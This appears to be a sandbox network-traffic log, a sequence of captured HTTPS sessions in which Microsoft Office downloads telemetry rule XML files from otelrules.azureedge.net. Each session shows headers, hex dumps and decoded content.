                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              63192.168.2.44981713.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:33 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:33 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:33 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 400
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                              ETag: "0x8DC582BB2D62837"
                                                                              x-ms-request-id: 13d0f17b-b01e-0053-80f4-24cdf8000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064933Z-15b8d89586fst84k5f3z220tec0000000he0000000000ktf
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:33 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              64192.168.2.44981813.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:33 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:33 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:33 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 479
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                              ETag: "0x8DC582BB7D702D0"
                                                                              x-ms-request-id: de733a63-101e-00a2-1415-269f2e000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064933Z-17c5cb586f6gkqkwd0x1ge8t04000000020g000000002fyh
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:33 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              65192.168.2.44982013.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:33 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:33 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:33 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 475
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                              ETag: "0x8DC582BB2BE84FD"
                                                                              x-ms-request-id: f826faa8-301e-0099-1457-266683000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064933Z-17c5cb586f6z6tw6g7cmdv30m800000002y00000000003kv
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:33 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              66192.168.2.44981913.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:33 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:33 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:33 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 425
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                              ETag: "0x8DC582BBA25094F"
                                                                              x-ms-request-id: 24b9edea-d01e-002b-4c3d-2625fb000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064933Z-r197bdfb6b46kdskt78qagqq1c00000001sg000000005ds3
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:33 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              67192.168.2.44982113.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:34 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:34 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:34 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 448
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                              ETag: "0x8DC582BB389F49B"
                                                                              x-ms-request-id: 84cbfce0-201e-0071-26f6-26ff15000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064934Z-r197bdfb6b46kmj4701qkq602400000000u0000000000k5z
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:34 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              68192.168.2.44982313.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:34 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:34 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:34 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 416
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                              ETag: "0x8DC582BAEA4B445"
                                                                              x-ms-request-id: a1cd263b-b01e-0070-5f2a-271cc0000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064934Z-16849878b78x6gn56mgecg60qc00000003k0000000001tb2
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:34 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              69192.168.2.44982213.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:34 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:34 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:34 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 491
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                              ETag: "0x8DC582B98B88612"
                                                                              x-ms-request-id: 7d1d0a8a-d01e-0049-263b-26e7dc000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064934Z-r197bdfb6b4hsj5bywyqk9r2xw00000002yg00000000aq2f
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:34 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              70192.168.2.44982513.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:34 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:34 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:34 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 415
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                              ETag: "0x8DC582BA80D96A1"
                                                                              x-ms-request-id: 4a7bd2a8-301e-0096-209e-26e71d000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064934Z-16849878b78qfbkc5yywmsbg0c000000019g00000000dwce
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:34 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              71192.168.2.44982413.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:34 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:34 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:34 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 479
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                              ETag: "0x8DC582B989EE75B"
                                                                              x-ms-request-id: 18fe904c-c01e-00a1-4257-277e4a000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064934Z-16849878b785jrf8dn0d2rczaw00000002rg00000000hh6y
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:34 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              72192.168.2.44982613.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:34 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:35 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:34 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 471
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                              ETag: "0x8DC582B97E6FCDD"
                                                                              x-ms-request-id: 9e4d4e08-401e-0047-1d64-278597000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064934Z-16849878b78rjhv97f3nhawr7s0000000a5g00000000mae3
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:35 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              73192.168.2.44982813.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:34 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:35 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:35 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 477
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                              ETag: "0x8DC582BA54DCC28"
                                                                              x-ms-request-id: 6c6fa777-201e-003c-1958-2630f9000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064935Z-r197bdfb6b4skzzvqpzzd3xetg000000011g000000004wh1
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
